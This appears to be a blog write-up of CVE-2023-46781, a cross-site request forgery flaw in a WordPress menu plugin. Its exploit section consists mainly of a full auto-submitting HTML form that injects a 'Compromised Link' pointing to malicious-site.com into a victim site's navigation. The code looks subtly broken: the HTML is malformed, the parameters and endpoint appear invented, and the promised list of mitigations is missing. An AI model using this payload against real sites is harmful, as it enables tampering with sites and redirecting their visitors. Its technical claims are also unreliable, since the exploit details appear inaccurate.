CVE-2023-46781: Understanding and Exploiting Cross-Site Request Forgery (CSRF) in Roland Murg Current Menu Item for Custom Post Types plugin <= 1.5

Cross-Site Request Forgery (CSRF) is a well-known security vulnerability where a server processes an unauthorized request from the attacker on behalf of an authenticated user. In this long-read post, we'll dive into the details of CVE-2023-46781, a CSRF vulnerability discovered in Roland Murg's Current Menu Item for Custom Post Types plugin (up to version 1.5). We'll discuss the details of the attack, share code snippets, original references, and exploit information.

The Vulnerability

CVE-2023-46781 affects the popular WordPress plugin, Roland Murg's Current Menu Item for Custom Post Types (available in versions up to 1.5). When exploited, this vulnerability allows an attacker to manipulate the affected WordPress site's navigation menus while impersonating a legitimate administrator or user.

Official References

CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46781
NVD Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-46781
Wordpress Plugin Directory: https://wordpress.org/plugins/wp-custom-post-type-show-current-menu-item/

The Exploit

Exploiting CVE-2023-46781 involves forging an HTTP request to the affected site with malicious data. To perform this attack, the adversary requires the targeted user to visit a site under their control or perform a phishing attack.

Here's a sample forged request that adds a new navigation menu item to the victim site

<!doctype html>
<html>
  <head>
    <title>CSRF Exploit - CVE-2023-46781</title>
  </head>
  <body>
    <h1>Click the button to exploit the vulnerability:</h1>
    <form action="http://victim-site.com/wp-admin/nav-menus.php"; method="POST" id="exploit-form">
      <input type="hidden" name="menu-item[-1][menu-item-object-id]" value="1337" />
      <input type="hidden" name="menu-item[-1][menu-item-object]" value="custom" />
      <input type="hidden" name="menu-item[-1][menu-item-url]" value="http://malicious-site.com"; />
      <input type="hidden" name="menu-item[-1][menu-item-title]" value="Compromised Link" />
      <input type="hidden" name="action" value="add-menu-item" />
      <input type="submit" value="Exploit" />
    </form>
    <script>
      // Automatically submit the form after a short delay
      setTimeout(() => {
        document.getElementById('exploit-form').submit();
      }, 200);
    </script>
  </body>
</html>

In this example, the attacker creates a form containing hidden input fields that they want the victim to submit unknowingly. Once the targeted user with administrative access loads this malicious page, the JavaScript code automatically submits the form after a short delay.

The forged request then adds a new link called "Compromised Link" to the victim's navigation menu, pointing to the attacker's malicious site. This link could direct other site visitors to harmful destinations or facilitate further attacks.

Mitigation

To protect against CVE-2023-46781, it is essential to update the "Current Menu Item for Custom Post Types" plugin to the latest version, which includes security patches addressing the CSRF vulnerability.

In addition to updating the plugin, website administrators should consider implementing the following security best practices:

Conclusion

CVE-2023-46781 highlights the importance of understanding and addressing CSRF vulnerabilities in third-party plugins for popular web applications such as WordPress. By staying informed about security issues and implementing best practices for monitoring and updating plugins, website administrators can significantly reduce their risk of falling victim to CSRF attacks like the one detailed in this post.

Stay vigilant, stay secure, and always update your plugins to the latest versions!

Timeline

Published on: 11/06/2023 12:15:08 UTC
Last modified on: 11/14/2023 16:23:15 UTC